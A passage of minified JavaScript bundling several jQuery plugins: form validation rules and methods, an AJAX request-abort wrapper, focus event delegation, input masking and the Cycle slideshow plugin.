$.data(element,"previousValue")||$.data(element,"previousValue",{old:null,valid:true,message:this.defaultMessage(element,"remote")});}},classRuleSettings:{required:{required:true},email:{email:true},url:{url:true},date:{date:true},dateISO:{dateISO:true},dateDE:{dateDE:true},number:{number:true},numberDE:{numberDE:true},digits:{digits:true},creditcard:{creditcard:true}},addClassRules:function(className,rules){className.constructor==String?this.classRuleSettings[className]=rules:$.extend(this.classRuleSettings,className);},classRules:function(element){var rules={};var classes=$(element).attr('class');classes&&$.each(classes.split(' '),function(){if(this in $.validator.classRuleSettings){$.extend(rules,$.validator.classRuleSettings[this]);}});return rules;},attributeRules:function(element){var rules={};var $element=$(element);for(method in $.validator.methods){var value=$element.attr(method);if(value){rules[method]=value;}}if(rules.maxlength&&/-1|2147483647|524288/.test(rules.maxlength)){delete rules.maxlength;}return rules;},metadataRules:function(element){if(!$.metadata)return{};var meta=$.data(element.form,'validator').settings.meta;return meta?$(element).metadata()[meta]:$(element).metadata();},staticRules:function(element){var rules={};var validator=$.data(element.form,'validator');if(validator.settings.rules){rules=$.validator.normalizeRule(validator.settings.rules[element.name])||{};}return rules;},normalizeRules:function(rules,element){$.each(rules,function(prop,val){if(val===false){delete rules[prop];return;}if(val.param||val.depends){var keepRule=true;switch(typeof val.depends){case"string":keepRule=!!$(val.depends,element.form).length;break;case"function":keepRule=val.depends.call(element,element);break;}if(keepRule){rules[prop]=val.param!==undefined?val.param:true;}else{delete rules[prop];}}});$.each(rules,function(rule,parameter){rules[rule]=$.isFunction(parameter)?parameter(element):parameter;});$.each(['minlength','maxlength','min','max'],function(){if(rules[this]){rules[this]=Number(rules[this]);}});$.each(['rangelength','range'],function(){if(rules[this]){rules[this]=[Number(rules[this][0]),Number(rules[this][1])];}});if($.validator.autoCreateRanges){if(rules.min&&rules.max){rules.range=[rules.min,rules.max];delete rules.min;delete rules.max;}if(rules.minlength&&rules.maxlength){rules.rangelength=[rules.minlength,rules.maxlength];delete rules.minlength;delete rules.maxlength;}}if(rules.messages){delete rules.messages;}return rules;},normalizeRule:function(data){if(typeof data=="string"){var transformed={};$.each(data.split(/\s/),function(){transformed[this]=true;});data=transformed;}return data;},addMethod:function(name,method,message){$.validator.methods[name]=method;$.validator.messages[name]=message!=undefined?message:$.validator.messages[name];if(method.length<3){$.validator.addClassRules(name,$.validator.normalizeRule(name));}},methods:{required:function(value,element,param){if(!this.depend(param,element))return"dependency-mismatch";switch(element.nodeName.toLowerCase()){case'select':var val=$(element).val();return val&&val.length>0;case'input':if(this.checkable(element))return this.getLength(value,element)>0;default:return $.trim(value).length>0;}},remote:function(value,element,param){if(this.optional(element))return"dependency-mismatch";var previous=this.previousValue(element);if(!this.settings.messages[element.name])this.settings.messages[element.name]={};previous.originalMessage=this.settings.messages[element.name].remote;this.settings.messages[element.name].remote=previous.message;param=typeof param=="string"&&{url:param}||param;if(previous.old!==value){previous.old=value;var validator=this;this.startRequest(element);var data={};data[element.name]=value;$.ajax($.extend(true,{url:param,mode:"abort",port:"validate"+element.name,dataType:"json",data:data,success:function(response){validator.settings.messages[element.name].remote=previous.originalMessage;var valid=response===true;if(valid){var submitted=validator.formSubmitted;validator.prepareElement(element);validator.formSubmitted=submitted;validator.successList.push(element);validator.showErrors();}else{var errors={};var message=(previous.message=response||validator.defaultMessage(element,"remote"));errors[element.name]=$.isFunction(message)?message(value):message;validator.showErrors(errors);}previous.valid=valid;validator.stopRequest(element,valid);}},param));return"pending";}else if(this.pending[element.name]){return"pending";}return previous.valid;},minlength:function(value,element,param){return this.optional(element)||this.getLength($.trim(value),element)>=param;},maxlength:function(value,element,param){return this.optional(element)||this.getLength($.trim(value),element)<=param;},rangelength:function(value,element,param){var length=this.getLength($.trim(value),element);return this.optional(element)||(length>=param[0]&&length<=param[1]);},min:function(value,element,param){return this.optional(element)||value>=param;},max:function(value,element,param){return this.optional(element)||value<=param;},range:function(value,element,param){return this.optional(element)||(value>=param[0]&&value<=param[1]);},email:function(value,element){return this.optional(element)||/^((([a-z]|\d|[!#\$%&'\*\+\-\/=\?\^_`{\|}~]|[\u00A0-\uD7FF\uF900-\uFDCF\uFDF0-\uFFEF])+(\.([a-z]|\d|[!#\$%&'\*\+\-\/=\?\^_`{\|}~]|[\u00A0-\uD7FF\uF900-\uFDCF\uFDF0-\uFFEF])+)*)|((\x22)((((\x20|\x09)*(\x0d\x0a))?(\x20|\x09)+)?(([\x01-\x08\x0b\x0c\x0e-\x1f\x7f]|\x21|[\x23-\x5b]|[\x5d-\x7e]|[\u00A0-\uD7FF\uF900-\uFDCF\uFDF0-\uFFEF])|(\\([\x01-\x09\x0b\x0c\x0d-\x7f]|[\u00A0-\uD7FF\uF900-\uFDCF\uFDF0-\uFFEF]))))*(((\x20|\x09)*(\x0d\x0a))?(\x20|\x09)+)?(\x22)))@((([a-z]|\d|[\u00A0-\uD7FF\uF900-\uFDCF\uFDF0-\uFFEF])|(([a-z]|\d|[\u00A0-\uD7FF\uF900-\uFDCF\uFDF0-\uFFEF])([a-z]|\d|-|\.|_|~|[\u00A0-\uD7FF\uF900-\uFDCF\uFDF0-\uFFEF])*([a-z]|\d|[\u00A0-\uD7FF\uF900-\uFDCF\uFDF0-\uFFEF])))\.)+(([a-z]|[\u00A0-\uD7FF\uF900-\uFDCF\uFDF0-\uFFEF])|(([a-z]|[\u00A0-\uD7FF\uF900-\uFDCF\uFDF0-\uFFEF])([a-z]|\d|-|\.|_|~|[\u00A0-\uD7FF\uF900-\uFDCF\uFDF0-\uFFEF])*([a-z]|[\u00A0-\uD7FF\uF900-\uFDCF\uFDF0-\uFFEF])))\.?$/i.test(value);},url:function(value,element){return this.optional(element)||/^(https?|ftp):\/\/(((([a-z]|\d|-|\.|_|~|[\u00A0-\uD7FF\uF900-\uFDCF\uFDF0-\uFFEF])|(%[\da-f]{2})|[!\$&'\(\)\*\+,;=]|:)*@)?(((\d|[1-9]\d|1\d\d|2[0-4]\d|25[0-5])\.(\d|[1-9]\d|1\d\d|2[0-4]\d|25[0-5])\.(\d|[1-9]\d|1\d\d|2[0-4]\d|25[0-5])\.(\d|[1-9]\d|1\d\d|2[0-4]\d|25[0-5]))|((([a-z]|\d|[\u00A0-\uD7FF\uF900-\uFDCF\uFDF0-\uFFEF])|(([a-z]|\d|[\u00A0-\uD7FF\uF900-\uFDCF\uFDF0-\uFFEF])([a-z]|\d|-|\.|_|~|[\u00A0-\uD7FF\uF900-\uFDCF\uFDF0-\uFFEF])*([a-z]|\d|[\u00A0-\uD7FF\uF900-\uFDCF\uFDF0-\uFFEF])))\.)+(([a-z]|[\u00A0-\uD7FF\uF900-\uFDCF\uFDF0-\uFFEF])|(([a-z]|[\u00A0-\uD7FF\uF900-\uFDCF\uFDF0-\uFFEF])([a-z]|\d|-|\.|_|~|[\u00A0-\uD7FF\uF900-\uFDCF\uFDF0-\uFFEF])*([a-z]|[\u00A0-\uD7FF\uF900-\uFDCF\uFDF0-\uFFEF])))\.?)(:\d*)?)(\/((([a-z]|\d|-|\.|_|~|[\u00A0-\uD7FF\uF900-\uFDCF\uFDF0-\uFFEF])|(%[\da-f]{2})|[!\$&'\(\)\*\+,;=]|:|@)+(\/(([a-z]|\d|-|\.|_|~|[\u00A0-\uD7FF\uF900-\uFDCF\uFDF0-\uFFEF])|(%[\da-f]{2})|[!\$&'\(\)\*\+,;=]|:|@)*)*)?)?(\?((([a-z]|\d|-|\.|_|~|[\u00A0-\uD7FF\uF900-\uFDCF\uFDF0-\uFFEF])|(%[\da-f]{2})|[!\$&'\(\)\*\+,;=]|:|@)|[\uE000-\uF8FF]|\/|\?)*)?(\#((([a-z]|\d|-|\.|_|~|[\u00A0-\uD7FF\uF900-\uFDCF\uFDF0-\uFFEF])|(%[\da-f]{2})|[!\$&'\(\)\*\+,;=]|:|@)|\/|\?)*)?$/i.test(value);},date:function(value,element){return this.optional(element)||!/Invalid|NaN/.test(new Date(value));},dateISO:function(value,element){return this.optional(element)||/^\d{4}[\/-]\d{1,2}[\/-]\d{1,2}$/.test(value);},number:function(value,element){return this.optional(element)||/^-?(?:\d+|\d{1,3}(?:,\d{3})+)(?:\.\d+)?$/.test(value);},digits:function(value,element){return this.optional(element)||/^\d+$/.test(value);},creditcard:function(value,element){if(this.optional(element))return"dependency-mismatch";if(/[^0-9-]+/.test(value))return false;var nCheck=0,nDigit=0,bEven=false;value=value.replace(/\D/g,"");for(var n=value.length-1;n>=0;n--){var cDigit=value.charAt(n);var nDigit=parseInt(cDigit,10);if(bEven){if((nDigit*=2)>9)nDigit-=9;}nCheck+=nDigit;bEven=!bEven;}return(nCheck%10)==0;},accept:function(value,element,param){param=typeof param=="string"?param.replace(/,/g,'|'):"png|jpe?g|gif";return this.optional(element)||value.match(new RegExp(".("+param+")$","i"));},equalTo:function(value,element,param){var target=$(param).unbind(".validate-equalTo").bind("blur.validate-equalTo",function(){$(element).valid();});return value==target.val();}}});$.format=$.validator.format;})(jQuery);;(function($){var ajax=$.ajax;var pendingRequests={};$.ajax=function(settings){settings=$.extend(settings,$.extend({},$.ajaxSettings,settings));var port=settings.port;if(settings.mode=="abort"){if(pendingRequests[port]){pendingRequests[port].abort();}return(pendingRequests[port]=ajax.apply(this,arguments));}return ajax.apply(this,arguments);};})(jQuery);;(function($){if(!jQuery.event.special.focusin&&!jQuery.event.special.focusout&&document.addEventListener){$.each({focus:'focusin',blur:'focusout'},function(original,fix){$.event.special[fix]={setup:function(){this.addEventListener(original,handler,true);},teardown:function(){this.removeEventListener(original,handler,true);},handler:function(e){arguments[0]=$.event.fix(e);arguments[0].type=fix;return $.event.handle.apply(this,arguments);}};function handler(e){e=$.event.fix(e);e.type=fix;return $.event.handle.call(this,e);}});};$.extend($.fn,{validateDelegate:function(delegate,type,handler){return this.bind(type,function(event){var target=$(event.target);if(target.is(delegate)){return handler.apply(target,arguments);}});}});})(jQuery);;(function(a){var c=(a.browser.msie?"paste":"input")+".mask";var b=(window.orientation!=undefined);a.mask={definitions:{"9":"[0-9]",a:"[A-Za-z]","*":"[A-Za-z0-9]"}};a.fn.extend({caret:function(e,f){if(this.length==0){return}if(typeof e=="number"){f=(typeof f=="number")?f:e;return this.each(function(){if(this.setSelectionRange){this.focus();this.setSelectionRange(e,f)}else{if(this.createTextRange){var g=this.createTextRange();g.collapse(true);g.moveEnd("character",f);g.moveStart("character",e);g.select()}}})}else{if(this[0].setSelectionRange){e=this[0].selectionStart;f=this[0].selectionEnd}else{if(document.selection&&document.selection.createRange){var d=document.selection.createRange();e=0-d.duplicate().moveStart("character",-100000);f=e+d.text.length}}return{begin:e,end:f}}},unmask:function(){return this.trigger("unmask")},mask:function(j,d){if(!j&&this.length>0){var f=a(this[0]);var g=f.data("tests");return a.map(f.data("buffer"),function(l,m){return g[m]?l:null}).join("")}d=a.extend({placeholder:"_",completed:null},d);var k=a.mask.definitions;var g=[];var e=j.length;var i=null;var h=j.length;a.each(j.split(""),function(m,l){if(l=="?"){h--;e=m}else{if(k[l]){g.push(new RegExp(k[l]));if(i==null){i=g.length-1}}else{g.push(null)}}});return this.each(function(){var r=a(this);var m=a.map(j.split(""),function(x,y){if(x!="?"){return k[x]?d.placeholder:x}});var n=false;var q=r.val();r.data("buffer",m).data("tests",g);function v(x){while(++x<=h&&!g[x]){}return x}function t(x){while(!g[x]&&--x>=0){}for(var y=x;y<h;y++){if(g[y]){m[y]=d.placeholder;var z=v(y);if(z<h&&g[y].test(m[z])){m[y]=m[z]}else{break}}}s();r.caret(Math.max(i,x))}function u(y){for(var A=y,z=d.placeholder;A<h;A++){if(g[A]){var B=v(A);var x=m[A];m[A]=z;if(B<h&&g[B].test(x)){z=x}else{break}}}}function l(y){var x=a(this).caret();var z=y.keyCode;n=(z<16||(z>16&&z<32)||(z>32&&z<41));if((x.begin-x.end)!=0&&(!n||z==8||z==46)){w(x.begin,x.end)}if(z==8||z==46||(b&&z==127)){t(x.begin+(z==46?0:-1));return false}else{if(z==27){r.val(q);r.caret(0,p());return false}}}function o(B){if(n){n=false;return(B.keyCode==8)?false:null}B=B||window.event;var C=B.charCode||B.keyCode||B.which;var z=a(this).caret();if(B.ctrlKey||B.altKey||B.metaKey){return true}else{if((C>=32&&C<=125)||C>186){var x=v(z.begin-1);if(x<h){var A=String.fromCharCode(C);if(g[x].test(A)){u(x);m[x]=A;s();var y=v(x);a(this).caret(y);if(d.completed&&y==h){d.completed.call(r)}}}}}return false}function w(x,y){for(var z=x;z<y&&z<h;z++){if(g[z]){m[z]=d.placeholder}}}function s(){return r.val(m.join("")).val()}function p(y){var z=r.val();var C=-1;for(var B=0,x=0;B<h;B++){if(g[B]){m[B]=d.placeholder;while(x++<z.length){var A=z.charAt(x-1);if(g[B].test(A)){m[B]=A;C=B;break}}if(x>z.length){break}}else{if(m[B]==z[x]&&B!=e){x++;C=B}}}if(!y&&C+1<e){r.val("");w(0,h)}else{if(y||C+1>=e){s();if(!y){r.val(r.val().substring(0,C+1))}}}return(e?B:i)}if(!r.attr("readonly")){r.one("unmask",function(){r.unbind(".mask").removeData("buffer").removeData("tests")}).bind("focus.mask",function(){q=r.val();var x=p();s();setTimeout(function(){if(x==j.length){r.caret(0,x)}else{r.caret(x)}},0)}).bind("blur.mask",function(){p();if(r.val()!=q){r.change()}}).bind("keydown.mask",l).bind("keypress.mask",o).bind(c,function(){setTimeout(function(){r.caret(p(true))},0)})}p()})}})})(jQuery);;(function($){var ver="2.80";if($.support==undefined){$.support={opacity:!($.browser.msie)};}function debug(s){if($.fn.cycle.debug){log(s);}}function log(){if(window.console&&window.console.log){window.console.log("[cycle] "+Array.prototype.join.call(arguments," "));}}$.fn.cycle=function(options,arg2){var o={s:this.selector,c:this.context};if(this.length===0&&options!="stop"){if(!$.isReady&&o.s){log("DOM not ready, queuing slideshow");$(function(){$(o.s,o.c).cycle(options,arg2);});return this;}log("terminating; zero elements found by selector"+($.isReady?"":" (DOM not ready)"));return this;}return this.each(function(){var opts=handleArguments(this,options,arg2);if(opts===false){return;}opts.updateActivePagerLink=opts.updateActivePagerLink||$.fn.cycle.updateActivePagerLink;if(this.cycleTimeout){clearTimeout(this.cycleTimeout);}this.cycleTimeout=this.cyclePause=0;var $cont=$(this);var $slides=opts.slideExpr?$(opts.slideExpr,this):$cont.children();var els=$slides.get();if(els.length<2){log("terminating; too few slides: "+els.length);return;}var opts2=buildOptions($cont,$slides,els,opts,o);if(opts2===false){return;}var startTime=opts2.continuous?10:getTimeout(opts2.currSlide,opts2.nextSlide,opts2,!opts2.rev);if(startTime){startTime+=(opts2.delay||0);if(startTime<10){startTime=10;}debug("first timeout: "+startTime);this.cycleTimeout=setTimeout(function(){go(els,opts2,0,!opts2.rev);},startTime);}});};function handleArguments(cont,options,arg2){if(cont.cycleStop==undefined){cont.cycleStop=0;}if(options===undefined||options===null){options={};}if(options.constructor==String){switch(options){case"destroy":case"stop":var opts=$(cont).data("cycle.opts");if(!opts){return false;}cont.cycleStop++;if(cont.cycleTimeout){clearTimeout(cont.cycleTimeout);}cont.cycleTimeout=0;$(cont).removeData("cycle.opts");if(options=="destroy"){destroy(opts);}return false;case"toggle":cont.cyclePause=(cont.cyclePause===1)?0:1;return false;case"pause":cont.cyclePause=1;return false;case"resume":cont.cyclePause=0;if(arg2===true){options=$(cont).data("cycle.opts");if(!options){log("options not found, can not resume");return false;}if(cont.cycleTimeout){clearTimeout(cont.cycleTimeout);cont.cycleTimeout=0;}go(options.elements,options,1,1);}return false;case"prev":case"next":var opts=$(cont).data("cycle.opts");if(!opts){log('options not found, "prev/next" ignored');return false;}$.fn.cycle[options](opts);return false;default:options={fx:options};}return options;}else{if(options.constructor==Number){var num=options;options=$(cont).data("cycle.opts");if(!options){log("options not found, can not advance slide");return false;}if(num<0||num>=options.elements.length){log("invalid slide index: "+num);return false;}options.nextSlide=num;if(cont.cycleTimeout){clearTimeout(cont.cycleTimeout);cont.cycleTimeout=0;}if(typeof arg2=="string"){options.oneTimeFx=arg2;}go(options.elements,options,1,num>=options.currSlide);return false;}}return options;}function removeFilter(el,opts){if(!$.support.opacity&&opts.cleartype&&el.style.filter){try{el.style.removeAttribute("filter");}catch(smother){}}}function destroy(opts){if(opts.next){$(opts.next).unbind(opts.prevNextEvent);}if(opts.prev){$(opts.prev).unbind(opts.prevNextEvent);}if(opts.pager||opts.pagerAnchorBuilder){$.each(opts.pagerAnchors||[],function(){this.unbind().remove();});}opts.pagerAnchors=null;if(opts.destroy){opts.destroy(opts);}}function buildOptions($cont,$slides,els,options,o){var opts=$.extend({},$.fn.cycle.defaults,options||{},$.metadata?$cont.metadata():$.meta?$cont.data():{});if(opts.autostop){opts.countdown=opts.autostopCount||els.length;}var cont=$cont[0];$cont.data("cycle.opts",opts);opts.$cont=$cont;opts.stopCount=cont.cycleStop;opts.elements=els;opts.before=opts.before?[opts.before]:[];opts.after=opts.after?[opts.after]:[];opts.after.unshift(function(){opts.busy=0;});if(!$.support.opacity&&opts.cleartype){opts.after.push(function(){removeFilter(this,opts);});}if(opts.continuous){opts.after.push(function(){go(els,opts,0,!opts.rev);});}saveOriginalOpts(opts);if(!$.support.opacity&&opts.cleartype&&!opts.cleartypeNoBg){clearTypeFix($slides);}if($cont.css("position")=="static"){$cont.css("position","relative");}if(opts.width){$cont.width(opts.width);}if(opts.height&&opts.height!="auto"){$cont.height(opts.height);}if(opts.startingSlide){opts.startingSlide=parseInt(opts.startingSlide);}if(opts.random){opts.randomMap=[];for(var i=0;i<els.length;i++){opts.randomMap.push(i);}opts.randomMap.sort(function(a,b){return Math.random()-0.5;});opts.randomIndex=1;opts.startingSlide=opts.randomMap[1];}else{if(opts.startingSlide>=els.length){opts.startingSlide=0;}}opts.currSlide=opts.startingSlide||0;var first=opts.startingSlide;$slides.css({position:"absolute",top:0,left:0}).hide().each(function(i){var z=first?i>=first?els.length-(i-first):first-i:els.length-i;$(this).css("z-index",z);});$(els[first]).css("opacity",1).show();removeFilter(els[first],opts);if(opts.fit&&opts.width){$slides.width(opts.width);}if(opts.fit&&opts.height&&opts.height!="auto"){$slides.height(opts.height);}var reshape=opts.containerResize&&!$cont.innerHeight();if(reshape){var maxw=0,maxh=0;for(var j=0;j<els.length;j++){var $e=$(els[j]),e=$e[0],w=$e.outerWidth(),h=$e.outerHeight();if(!w){w=e.offsetWidth||e.width||$e.attr("width");}if(!h){h=e.offsetHeight||e.height||$e.attr("height");}maxw=w>maxw?w:maxw;maxh=h>maxh?h:maxh;}if(maxw>0&&maxh>0){$cont.css({width:maxw+"px",height:maxh+"px"});}}if(opts.pause){$cont.hover(function(){this.cyclePause++;},function(){this.cyclePause--;});}if(supportMultiTransitions(opts)===false){return false;}var requeue=false;options.requeueAttempts=options.requeueAttempts||0;$slides.each(function(){var $el=$(this);this.cycleH=(opts.fit&&opts.height)?opts.height:($el.height()||this.offsetHeight||this.height||$el.attr("height")||0);this.cycleW=(opts.fit&&opts.width)?opts.width:($el.width()||this.offsetWidth||this.width||$el.attr("width")||0);if($el.is("img")){var loadingIE=($.browser.msie&&this.cycleW==28&&this.cycleH==30&&!this.complete);var loadingFF=($.browser.mozilla&&this.cycleW==34&&this.cycleH==19&&!this.complete);var loadingOp=($.browser.opera&&((this.cycleW==42&&this.cycleH==19)||(this.cycleW==37&&this.cycleH==17))&&!this.complete);var loadingOther=(this.cycleH==0&&this.cycleW==0&&!this.complete);if(loadingIE||loadingFF||loadingOp||loadingOther){if(o.s&&opts.requeueOnImageNotLoaded&&++options.requeueAttempts<100){log(options.requeueAttempts," - img slide not loaded, requeuing slideshow: ",this.src,this.cycleW,this.cycleH);setTimeout(function(){$(o.s,o.c).cycle(options);},opts.requeueTimeout);requeue=true;return false;}else{log("could not determine size of image: "+this.src,this.cycleW,this.cycleH);}}}return true;});if(requeue){return false;}opts.cssBefore=opts.cssBefore||{};opts.animIn=opts.animIn||{};opts.animOut=opts.animOut||{};$slides.not(":eq("+first+")").css(opts.cssBefore);if(opts.cssFirst){$($slides[first]).css(opts.cssFirst);}if(opts.timeout){opts.timeout=parseInt(opts.timeout);if(opts.speed.constructor==String){opts.speed=$.fx.speeds[opts.speed]||parseInt(opts.speed);}if(!opts.sync){opts.speed=opts.speed/2;}while((opts.timeout-opts.speed)<250){opts.timeout+=opts.speed;}}if(opts.easing){opts.easeIn=opts.easeOut=opts.easing;}if(!opts.speedIn){opts.speedIn=opts.speed;}if(!opts.speedOut){opts.speedOut=opts.speed;}opts.slideCount=els.length;opts.currSlide=opts.lastSlide=first;if(opts.random){if(++opts.randomIndex==els.length){opts.randomIndex=0;}opts.nextSlide=opts.randomMap[opts.randomIndex];}else{opts.nextSlide=opts.startingSlide>=(els.length-1)?0:opts.startingSlide+1;}if(!opts.multiFx){var init=$.fn.cycle.transitions[opts.fx];if($.isFunction(init)){init($cont,$slides,opts);}else{if(opts.fx!="custom"&&!opts.multiFx){log("unknown transition: "+opts.fx,"; slideshow terminating");return false;}}}var e0=$slides[first];if(opts.before.length){opts.before[0].apply(e0,[e0,e0,opts,true]);}if(opts.after.length>1){opts.after[1].apply(e0,[e0,e0,opts,true]);}if(opts.next){$(opts.next).bind(opts.prevNextEvent,function(){return advance(opts,opts.rev?-1:1);});}if(opts.prev){$(opts.prev).bind(opts.prevNextEvent,function(){return advance(opts,opts.rev?1:-1);});}if(opts.pager||opts.pagerAnchorBuilder){buildPager(els,opts);}exposeAddSlide(opts,els);return opts;}function saveOriginalOpts(opts){opts.original={before:[],after:[]};opts.original.cssBefore=$.extend({},opts.cssBefore);opts.original.cssAfter=$.extend({},opts.cssAfter);opts.original.animIn=$.extend({},opts.animIn);opts.original.animOut=$.extend({},opts.animOut);$.each(opts.before,function(){opts.original.before.push(this);});$.each(opts.after,function(){opts.original.after.push(this);});}function supportMultiTransitions(opts){var i,tx,txs=$.fn.cycle.transitions;if(opts.fx.indexOf(",")>0){opts.multiFx=true;opts.fxs=opts.fx.replace(/\s*/g,"").split(",");for(i=0;i<opts.fxs.length;i++){var fx=opts.fxs[i];tx=txs[fx];if(!tx||!txs.hasOwnProperty(fx)||!$.isFunction(tx)){log("discarding unknown transition: ",fx);opts.fxs.splice(i,1);i--;}}if(!opts.fxs.length){log("No valid transitions named; slideshow terminating.");return false;}}else{if(opts.fx=="all"){opts.multiFx=true;opts.fxs=[];for(p in txs){tx=txs[p];if(txs.hasOwnProperty(p)&&$.isFunction(tx)){opts.fxs.push(p);}}}}if(opts.multiFx&&opts.randomizeEffects){var r1=Math.floor(Math.random()*20)+30;for(i=0;i<r1;i++){var r2=Math.floor(Math.random()*opts.fxs.length);opts.fxs.push(opts.fxs.splice(r2,1)[0]);}debug("randomized fx sequence: ",opts.fxs);}return true;}function exposeAddSlide(opts,els){opts.addSlide=function(newSlide,prepend){var $s=$(newSlide),s=$s[0];if(!opts.autostopCount){opts.countdown++;}els[prepend?"unshift":"push"](s);if(opts.els){opts.els[prepend?"unshift":"push"](s);}opts.slideCount=els.length;$s.css("position","absolute");$s[prepend?"prependTo":"appendTo"](opts.$cont);if(prepend){opts.currSlide++;opts.nextSlide++;}if(!$.support.opacity&&opts.cleartype&&!opts.cleartypeNoBg){clearTypeFix($s);}if(opts.fit&&opts.width){$s.width(opts.width);}if(opts.fit&&opts.height&&opts.height!="auto"){$slides.height(opts.height);}s.cycleH=(opts.fit&&opts.height)?opts.height:$s.height();s.cycleW=(opts.fit&&opts.width)?opts.width:$s.width();$s.css(opts.cssBefore);if(opts.pager||opts.pagerAnchorBuilder){$.fn.cycle.createPagerAnchor(els.length-1,s,$(opts.pager),els,opts);}if($.isFunction(opts.onAddSlide)){opts.onAddSlide($s);}else{$s.hide();}};}$.fn.cycle.resetState=function(opts,fx){fx=fx||opts.fx;opts.before=[];opts.after=[];opts.cssBefore=$.extend({},opts.original.cssBefore);opts.cssAfter=$.extend({},opts.original.cssAfter);opts.animIn=$.extend({},opts.original.animIn);opts.animOut=$.extend({},opts.original.animOut);opts.fxFn=null;$.each(opts.original.before,function(){opts.before.push(this);});$.each(opts.original.after,function(){opts.after.push(this);});var init=$.fn.cycle.transitions[fx];if($.isFunction(init)){init(opts.$cont,$(opts.elements),opts);}};function go(els,opts,manual,fwd){if(manual&&opts.busy&&opts.manualTrump){$(els).stop(true,true);opts.busy=false;}if(opts.busy){return;}var p=opts.$cont[0],curr=els[opts.currSlide],next=els[opts.nextSlide];if(p.cycleStop!=opts.stopCount||p.cycleTimeout===0&&!manual){return;}if(!manual&&!p.cyclePause&&((opts.autostop&&(--opts.countdown<=0))||(opts.nowrap&&!opts.random&&opts.nextSlide<opts.currSlide))){if(opts.end){opts.end(opts);}return;}if((manual||!p.cyclePause)&&(opts.nextSlide!=opts.currSlide)){var fx=opts.fx;curr.cycleH=curr.cycleH||$(curr).height();curr.cycleW=curr.cycleW||$(curr).width();next.cycleH=next.cycleH||$(next).height();next.cycleW=next.cycleW||$(next).width();if(opts.multiFx){if(opts.lastFx==undefined||++opts.lastFx>=opts.fxs.length){opts.lastFx=0;}fx=opts.fxs[opts.lastFx];opts.currFx=fx;}if(opts.oneTimeFx){fx=opts.oneTimeFx;opts.oneTimeFx=null;}$.fn.cycle.resetState(opts,fx);if(opts.before.length){$.each(opts.before,function(i,o){if(p.cycleStop!=opts.stopCount){return;}o.apply(next,[curr,next,opts,fwd]);});}var after=function(){$.each(opts.after,function(i,o){if(p.cycleStop!=opts.stopCount){return;}o.apply(next,[curr,next,opts,fwd]);});};opts.busy=1;if(opts.fxFn){opts.fxFn(curr,next,opts,after,fwd);}else{if($.isFunction($.fn.cycle[opts.fx])){$.fn.cycle[opts.fx](curr,next,opts,after);}else{$.fn.cycle.custom(curr,next,opts,after,manual&&opts.fastOnEvent);}}opts.lastSlide=opts.currSlide;if(opts.random){opts.currSlide=opts.nextSlide;if(++opts.randomIndex==els.length){opts.randomIndex=0;}opts.nextSlide=opts.randomMap[opts.randomIndex];}else{var roll=(opts.nextSlide+1)==els.length;opts.nextSlide=roll?0:opts.nextSlide+1;opts.currSlide=roll?els.length-1:opts.nextSlide-1;}if(opts.pager){opts.updateActivePagerLink(opts.pager,opts.currSlide,opts.activePagerClass);}}var ms=0;if(opts.timeout&&!opts.continuous){ms=getTimeout(curr,next,opts,fwd);}else{if(opts.continuous&&p.cyclePause){ms=10;}}if(ms>0){p.cycleTimeout=setTimeout(function(){go(els,opts,0,!opts.rev);},ms);}}$.fn.cycle.updateActivePagerLink=function(pager,currSlide,clsName){$(pager).each(function(){$(this).find("a").removeClass(clsName).filter("a:eq("+currSlide+")").addClass(clsName);});};function getTimeout(curr,next,opts,fwd){if(opts.timeoutFn){var t=opts.timeoutFn(curr,next,opts,fwd);while((t-opts.speed)<250){t+=opts.speed;}debug("calculated timeout: "+t+"; speed: "+opts.speed);if(t!==false){return t;}}return opts.timeout;}$.fn.cycle.next=function(opts){advance(opts,opts.rev?-1:1);};$.fn.cycle.prev=function(opts){advance(opts,opts.rev?1:-1);};function advance(opts,val){var els=opts.elements;var p=opts.$cont[0],timeout=p.cycleTimeout;if(timeout){clearTimeout(timeout);p.cycleTimeout=0;}if(opts.random&&val<0){opts.randomIndex--;if(--opts.randomIndex==-2){opts.randomIndex=els.length-2;}else{if(opts.randomIndex==-1){opts.randomIndex=els.length-1;}}opts.nextSlide=opts.randomMap[opts.randomIndex];}else{if(opts.random){opts.nextSlide=opts.randomMap[opts.randomIndex];}else{opts.nextSlide=opts.currSlide+val;if(opts.nextSlide<0){if(opts.nowrap){return false;}opts.nextSlide=els.length-1;}else{if(opts.nextSlide>=els.length){if(opts.nowrap){return false;}opts.nextSlide=0;}}}}if($.isFunction(opts.prevNextClick)){opts.prevNextClick(val>0,opts.nextSlide,els[opts.nextSlide]);}go(els,opts,1,val>=0);return false;}function buildPager(els,opts){var $p=$(opts.pager);$.each(els,function(i,o){$.fn.cycle.createPagerAnchor(i,o,$p,els,opts);});opts.updateActivePagerLink(opts.pager,opts.startingSlide,opts.activePagerClass);}$.fn.cycle.createPagerAnchor=function(i,el,$p,els,opts){var a;if($.isFunction(opts.pagerAnchorBuilder)){a=opts.pagerAnchorBuilder(i,el);}else{a='<a href="#">'+(i+1)+"</a>";}if(!a){return;}var $a=$(a);if($a.parents("body").length===0){var arr=[];if($p.length>1){$p.each(function(){var $clone=$a.clone(true);$(this).append($clone);arr.push($clone[0]);});$a=$(arr);}else{$a.appendTo($p);}}opts.pagerAnchors=opts.pagerAnchors||[];opts.pagerAnchors.push($a);$a.bind(opts.pagerEvent,function(e){e.preventDefault();opts.nextSlide=i;var p=opts.$cont[0],timeout=p.cycleTimeout;if(timeout){clearTimeout(timeout);p.cycleTimeout=0;}if($.isFunction(opts.pagerClick)){opts.pagerClick(opts.nextSlide,els[opts.nextSlide]);}go(els,opts,1,opts.currSlide<i);});if(!/^click/.test(opts.pagerEvent)&&!opts.allowPagerClickBubble){$a.bind("click.cycle",function(){return false;});}if(opts.pauseOnPagerHover){$a.hover(function(){opts.$cont[0].cyclePause++;},function(){opts.$cont[0].cyclePause--;});}};$.fn.cycle.hopsFromLast=function(opts,fwd){var hops,l=opts.lastSlide,c=opts.currSlide;if(fwd){hops=c>l?c-l:opts.slideCount-l;}else{hops=c<l?l-c:l+opts.slideCount-c;}return hops;};function clearTypeFix($slides){function hex(s){s=parseInt(s).toString(16);return s.length<2?"0"+s:s;}function getBg(e){for(;e&&e.nodeName.toLowerCase()!="html";e=e.parentNode){var v=$.css(e,"background-color");if(v.indexOf("rgb")>=0){var rgb=v.match(/\d+/g);return"#"+hex(rgb[0])+hex(rgb[1])+hex(rgb[2]);}if(v&&v!="transparent"){return 